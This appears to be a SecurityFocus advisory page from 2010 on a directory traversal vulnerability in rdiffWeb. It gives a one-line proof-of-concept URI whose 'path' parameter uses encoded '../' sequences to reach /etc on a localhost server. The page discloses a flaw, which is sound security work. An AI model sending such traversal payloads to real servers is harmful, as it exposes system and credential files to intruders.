info
discussion
exploit
solution
references
rdiffWeb Directory Traversal Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://localhost:8080/browse/?repo=b&path=..%2F..%2F..%2Fetc
Privacy Statement
Copyright 2010, SecurityFocus
